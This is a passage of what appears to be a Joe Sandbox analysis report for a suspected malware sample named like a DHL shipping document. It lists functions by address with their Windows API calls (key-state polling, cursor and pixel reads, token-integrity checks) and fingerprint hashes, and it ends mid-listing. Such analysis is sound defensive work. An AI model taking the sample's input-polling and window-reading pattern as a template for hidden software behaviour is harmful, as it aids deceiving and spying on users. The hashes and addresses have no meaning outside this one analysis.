                                                                                        • Instruction Fuzzy Hash: 5F510975A04205DFCB00EFA8C484AADB7B5FF09320F14C169E95AAB352DB31AE46DF51
                                                                                        APIs
                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C6E61F
                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C6E648
                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C6E687
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C6E6AC
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C6E6B4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1389676194-0
                                                                                        • Opcode ID: 55170da582794c1450b1a77211d4f1f29ee230ab0d06113eea57f67f5ed8f34e
                                                                                        • Instruction ID: afceafcfa51945a7925203f2e9759e651aede017a449f57e78303c504a8084ac
                                                                                        • Opcode Fuzzy Hash: 55170da582794c1450b1a77211d4f1f29ee230ab0d06113eea57f67f5ed8f34e
                                                                                        • Instruction Fuzzy Hash: 2E511D79A00105DFCB11EF64C981AAEBBF5EF09314F1480A9E859AB3A2CB31ED11DF50
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 00C02357
                                                                                        • ScreenToClient.USER32(00CC57B0,?), ref: 00C02374
                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00C02399
                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00C023A7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                        • String ID:
                                                                                        • API String ID: 4210589936-0
                                                                                        • Opcode ID: c2794a857488c0d091eeb761a14c67db3d36772c77f0710e187f1bf9c74a6309
                                                                                        • Instruction ID: 24619e95b332d124ad556b8f0127db6a916ac002ea6a2f9f95e891358d061a5e
                                                                                        • Opcode Fuzzy Hash: c2794a857488c0d091eeb761a14c67db3d36772c77f0710e187f1bf9c74a6309
                                                                                        • Instruction Fuzzy Hash: 44414F35604119FBDF199F69C888AEDBB78BB05364F204359F939A22E0C7349E50EF91
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C563E7
                                                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00C56433
                                                                                        • TranslateMessage.USER32(?), ref: 00C5645C
                                                                                        • DispatchMessageW.USER32(?), ref: 00C56466
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C56475
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                        • String ID:
                                                                                        • API String ID: 2108273632-0
                                                                                        • Opcode ID: 830394d255b4ef602a5603387b6dd641a0b8bd64304223e049a43074ca306929
                                                                                        • Instruction ID: bbd72688ed147da7a2b8759d54191e721d62cc23c1e350b337905f81ffc69905
                                                                                        • Opcode Fuzzy Hash: 830394d255b4ef602a5603387b6dd641a0b8bd64304223e049a43074ca306929
                                                                                        • Instruction Fuzzy Hash: AC31A275A40646AFDB64CFB0DC44FBA7BE8AB01306F940169E821C31A1E735A9CDD768
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00C58A30
                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00C58ADA
                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C58AE2
                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00C58AF0
                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C58AF8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3382505437-0
                                                                                        • Opcode ID: 8e11f6ad8c9d3abf8897ef936fa2e369cb26e7b8922cef0eefcaa73a20573cd1
                                                                                        • Instruction ID: 49ba962ae2eb4c1339c34b6f2e204e7437e3942a5f38415fc8b2451986e360ce
                                                                                        • Opcode Fuzzy Hash: 8e11f6ad8c9d3abf8897ef936fa2e369cb26e7b8922cef0eefcaa73a20573cd1
                                                                                        • Instruction Fuzzy Hash: 7931DF71500219EBDF14CFA8D94CB9E3BB5EB04316F10822AF924E71D1C7B09A58EB94
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C8B192
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00C8B1B7
                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C8B1CF
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00C8B1F8
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C70E90,00000000), ref: 00C8B216
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2294984445-0
                                                                                        • Opcode ID: 9272c5e6c56173ecb4dfc4b76fd79f88da8d58ae1445b95fda184e1071b8e8cd
                                                                                        • Instruction ID: 958652609d3d2759822f05fdca6958b5d95eb5c69ad8917e383f835eb5b65525
                                                                                        • Opcode Fuzzy Hash: 9272c5e6c56173ecb4dfc4b76fd79f88da8d58ae1445b95fda184e1071b8e8cd
                                                                                        • Instruction Fuzzy Hash: 5D218D71A10651AFCB20AF39DC18B6E3BA4FB05325F154728F932D71E0E7309D619B98
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 00C75A6E
                                                                                        • GetForegroundWindow.USER32 ref: 00C75A85
                                                                                        • GetDC.USER32(00000000), ref: 00C75AC1
                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00C75ACD
                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00C75B08
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                        • String ID:
                                                                                        • API String ID: 4156661090-0
                                                                                        • Opcode ID: 0846de0bdb2f51e2f104a15fd7512423aa6ab7ce2b5b984e7f1cdbb34b734556
                                                                                        • Instruction ID: e211f9028d68abad54b8655aa74b02fc3d74c4573b9ba794355581b4b1005de0
                                                                                        • Opcode Fuzzy Hash: 0846de0bdb2f51e2f104a15fd7512423aa6ab7ce2b5b984e7f1cdbb34b734556
                                                                                        • Instruction Fuzzy Hash: 7A219F35A00204AFDB10EF65D888BAEBBE5EF48310F14C17DF94997362DA70AD41DB90
                                                                                        APIs
                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C0134D
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00C0135C
                                                                                        • BeginPath.GDI32(?), ref: 00C01373
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00C0139C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                        • String ID:
                                                                                        • API String ID: 3225163088-0
                                                                                        • Opcode ID: ba97803e8c46b97e0b635732a0ef7f90fe31ddc65270f654e7e7193e992b8006
                                                                                        • Instruction ID: 9a11d3b06eab83d3c052c4888b46ad53f01b04d1303c389eec62ca18a43f4593
                                                                                        • Opcode Fuzzy Hash: ba97803e8c46b97e0b635732a0ef7f90fe31ddc65270f654e7e7193e992b8006
                                                                                        • Instruction Fuzzy Hash: DD213D70840708EFDB119F25DC49B6DBBE8FB10761F58422AF820961F0D771A996DF91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 2931989736-0
                                                                                        • Opcode ID: cfcb98c37b4a14dfa3df6412795ed97031a9f1c121c92b9fe82cf0af39d4967a
                                                                                        • Instruction ID: 5924d143ba68a5e3743c256676127faa4a29b2dc6916b7246dbc42056308bb33
                                                                                        • Opcode Fuzzy Hash: cfcb98c37b4a14dfa3df6412795ed97031a9f1c121c92b9fe82cf0af39d4967a
                                                                                        • Instruction Fuzzy Hash: E201B5766001197BE6046B16AD42FBBBB5CDF30389B184021FD1996346FB50FE5492AC
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00C64ABA
                                                                                        • __beginthreadex.LIBCMT ref: 00C64AD8
                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00C64AED
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C64B03
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C64B0A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                        • String ID:
                                                                                        • API String ID: 3824534824-0
                                                                                        • Opcode ID: 6b6352f6557d6c9275742241199e4be03aecd211f79fbffa4071761bccf190cc
                                                                                        • Instruction ID: 4ff2f54fbe79ab92e058c808cf4f5c2b20a2c1054e4eda5c2a7f2900c5692de6
                                                                                        • Opcode Fuzzy Hash: 6b6352f6557d6c9275742241199e4be03aecd211f79fbffa4071761bccf190cc
                                                                                        • Instruction Fuzzy Hash: 47114472D08618BBC7108FA8EC48F9F7FACEB85320F144269F824D3260D670DD4087A0
                                                                                        APIs
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C5821E
                                                                                        • GetLastError.KERNEL32(?,00C57CE2,?,?,?), ref: 00C58228
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00C57CE2,?,?,?), ref: 00C58237
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00C57CE2,?,?,?), ref: 00C5823E
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C58255
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 842720411-0
                                                                                        • Opcode ID: 15bea2b84707e15e5be3859830e55a762806abb120f858008b41085ff1bbb88c
                                                                                        • Instruction ID: 12aa48ab9fa9c1dcfbb7dbf83ccb99bc400b6b90f9f2577d81f09905aab808a2
                                                                                        • Opcode Fuzzy Hash: 15bea2b84707e15e5be3859830e55a762806abb120f858008b41085ff1bbb88c
                                                                                        • Instruction Fuzzy Hash: 9C014675200204BFDB204FA6DC88E6F7FACEF8A755B500529F859D2260DA318D59CB64
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?,?,?,00C57455), ref: 00C57127
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?,?), ref: 00C57142
                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?,?), ref: 00C57150
                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?), ref: 00C57160
                                                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?,?), ref: 00C5716C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 3897988419-0
                                                                                        • Opcode ID: e15b1f9677e3e4bf061301b247637e4466a7a4ccc9801e16642c37047a4eda46
                                                                                        • Instruction ID: 958ceec5786cc156718381dc1974a7cfa5156820801e2c9c16078bb3069c3ed6
                                                                                        • Opcode Fuzzy Hash: e15b1f9677e3e4bf061301b247637e4466a7a4ccc9801e16642c37047a4eda46
                                                                                        • Instruction Fuzzy Hash: 9101BC7A600604ABCB104F65EC48BAE7BADEB44792F100268FD08D3220DB71DEC18BA4
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C65260
                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C6526E
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C65276
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C65280
                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C652BC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                        • String ID:
                                                                                        • API String ID: 2833360925-0
                                                                                        • Opcode ID: fc43c42bea379859beb86840930e6a28df05047296a7acf61f04f3a42b2dda7f
                                                                                        • Instruction ID: 022381ae35af169127b349133d17e2254b7f821d73f2c390b19ff6a80d8b54b4
                                                                                        • Opcode Fuzzy Hash: fc43c42bea379859beb86840930e6a28df05047296a7acf61f04f3a42b2dda7f
                                                                                        • Instruction Fuzzy Hash: B0015731D01A29DBCF10EFE4EC98AEDBB78BB09711F50045AE941F2154CB30555187A5
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C58121
                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C5812B
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C5813A
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C58141
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C58157
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 653909e47577d29fe652c1fb7a342fe24c6c7ff9d6de86600a82f8d8ad31c44d
                                                                                        • Instruction ID: 4586bce1c62582aad47dd955e43d97fa20895ed8c8b669e2f67e73307e2891ea
                                                                                        • Opcode Fuzzy Hash: 653909e47577d29fe652c1fb7a342fe24c6c7ff9d6de86600a82f8d8ad31c44d
                                                                                        • Instruction Fuzzy Hash: 33F06275200304AFEB111FA5EC8CF6F3BACFF4A755B100029F985D6160DB619D4ADB64
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00C5C1F7
                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C5C20E
                                                                                        • MessageBeep.USER32(00000000), ref: 00C5C226
                                                                                        • KillTimer.USER32(?,0000040A), ref: 00C5C242
                                                                                        • EndDialog.USER32(?,00000001), ref: 00C5C25C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3741023627-0
                                                                                        • Opcode ID: f2263f923f08b2cce250112fce4a2f24be78b1fe94da33068151a3bdbaeb456f
                                                                                        • Instruction ID: 3c1111ab9f54144b8c2e846722193e2dcccf8514cc34a0b25c2869432491e493
                                                                                        • Opcode Fuzzy Hash: f2263f923f08b2cce250112fce4a2f24be78b1fe94da33068151a3bdbaeb456f
                                                                                        • Instruction Fuzzy Hash: B401A234404704ABEB205B60ED8EB9A77B8BB00B06F00026DB952A14E1DBE469C99B98
                                                                                        APIs
                                                                                        • EndPath.GDI32(?), ref: 00C013BF
                                                                                        • StrokeAndFillPath.GDI32(?,?,00C3B888,00000000,?), ref: 00C013DB
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00C013EE
                                                                                        • DeleteObject.GDI32 ref: 00C01401
                                                                                        • StrokePath.GDI32(?), ref: 00C0141C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                        • String ID:
                                                                                        • API String ID: 2625713937-0
                                                                                        • Opcode ID: 61be246eea7153dba5624c3b443fcebd4d69c51da509237fe4edb99b49053967
                                                                                        • Instruction ID: fcb8948cdd007133e4b2ed505a8ce43a399ef418dee85c8b3a0c6928d34233b0
                                                                                        • Opcode Fuzzy Hash: 61be246eea7153dba5624c3b443fcebd4d69c51da509237fe4edb99b49053967
                                                                                        • Instruction Fuzzy Hash: DEF0C430044A08EFDB115F66EC4CB5C7BA5AB11726F188228E869890F1CB359AA6EF54
                                                                                        APIs
                                                                                          • Part of subcall function 00C20DB6: std::exception::exception.LIBCMT ref: 00C20DEC
                                                                                          • Part of subcall function 00C20DB6: __CxxThrowException@8.LIBCMT ref: 00C20E01
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                          • Part of subcall function 00C07A51: _memmove.LIBCMT ref: 00C07AAB
